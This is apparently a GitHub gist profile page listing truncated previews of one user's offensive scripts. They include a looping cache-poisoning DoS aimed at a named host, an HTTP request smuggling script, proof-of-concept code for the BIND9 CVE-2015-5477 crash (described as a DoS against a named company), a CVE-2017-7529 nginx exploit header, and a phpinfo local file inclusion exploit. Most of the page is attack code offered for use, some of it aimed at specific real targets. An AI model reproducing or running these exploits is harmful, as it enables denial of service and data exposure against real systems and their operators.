Skip to content

Instantly share code, notes, and snippets.

View andripwn's full-sized avatar
☺️
Taking it easy

mickeybrew andripwn

☺️
Taking it easy
View GitHub Profile
#!/bin/bash
#
# script for subdomain enumeration using 4 of the best tools with some APIs:
# * findomain: https://github.com/Edu4rdSHL/findomain
# * SubFinder: https://github.com/projectdiscovery/subfinder
# * Amass: https://github.com/OWASP/Amass
# * AssetFinder: https://github.com/tomnomnom/assetfinder
#
bold="\e[1m"
@andripwn
andripwn / Cache-poisoning.sh
Last active September 26, 2020 17:14
Cache poisoning DoS to various aa-assets (#High Vulnerability)
#!/bin/bash
while true
do
printf 'GET /?cb=xxx HTTP/1.1\r\n'\
'Host: blanco-dev.eu2.frbit.net\r\n'\
'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0\r\n'\
'Accept: */*\r\n'\
'Accept-Language: en-US,en;q=0.5\r\n'\
'Accept-Encoding: gzip, deflate\r\n'\
@andripwn
andripwn / smuggling.jar
Created March 24, 2020 16:49
P-LOAD HTTP Request Smuggling
# if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time
import re
def queueRequests(target, wordlists):
# to use Burp's HTTP stack for upstream proxy rules etc, use engine=Engine.BURP
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=5,
requestsPerConnection=1,
resumeSSL=False,
@andripwn
andripwn / poc.py
Created April 7, 2020 03:37
DoS of (smartsupp.com) via CVE-2015-5477 exploitation
#!/usr/bin/env python
import socket
import sys
print('CVE-2015-5477 BIND9 TKEY PoC')
if len(sys.argv) < 2:
print('Usage: ' + sys.argv[0] + ' [target]')
sys.exit(1)
<?php
date_default_timezone_set('Asia/Jakarta');
/**
* @Author: Eka Syahwan
* @Date: 2017-09-09 07:04:25
* @Last Modified by: VanGans
* @Last Modified time: 2018-09-17 17:03:32
*/
error_reporting(0);
ini_set('memory_limit', '-1');
<?php
date_default_timezone_set("Asia/Jakarta");
define("OS", strtolower(PHP_OS));
require_once "RollingCurl/RollingCurl.php";
require_once "RollingCurl/Request.php";
echo banner();
enterlist:
$listname = readline("Enter list : ");
@andripwn
andripwn / CVE-2017-7529.py
Created April 20, 2020 16:53
Remote Integer Overflow Vulnerability #15
Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.
#!/usr/bin/python
# -*- coding:utf-8 -*-
# Nginx - Remote Integer Overflow Vulnerability
# CVE-2017-7529
import requests
import logging
@andripwn
andripwn / CVE-2015-5477.py
Created April 25, 2020 16:11
CVE-2015-5477 Exploitation Vulnerability
#!/usr/bin/env python
import socket
import sys
print('CVE-2015-5477 BIND9 TKEY PoC')
if len(sys.argv) < 2:
print('Usage: ' + sys.argv[0] + ' [target]')
sys.exit(1)
import socket
import sys
import struct
# construct the DNS query
def dnsquery(domain):
d = ""
for a in domain.split('.'):
d = d + struct.pack("!b" + str(len(a)) + "s", len(a), a)
@andripwn
andripwn / phpinfolfi.py
Created May 22, 2020 16:50
phpinfo - Local File Inclusion (LFI)
#!/usr/bin/python
from __future__ import print_function
from builtins import range
import sys
import threading
import socket
def setup(host, port):
TAG="Security Test"
PAYLOAD="""%s\r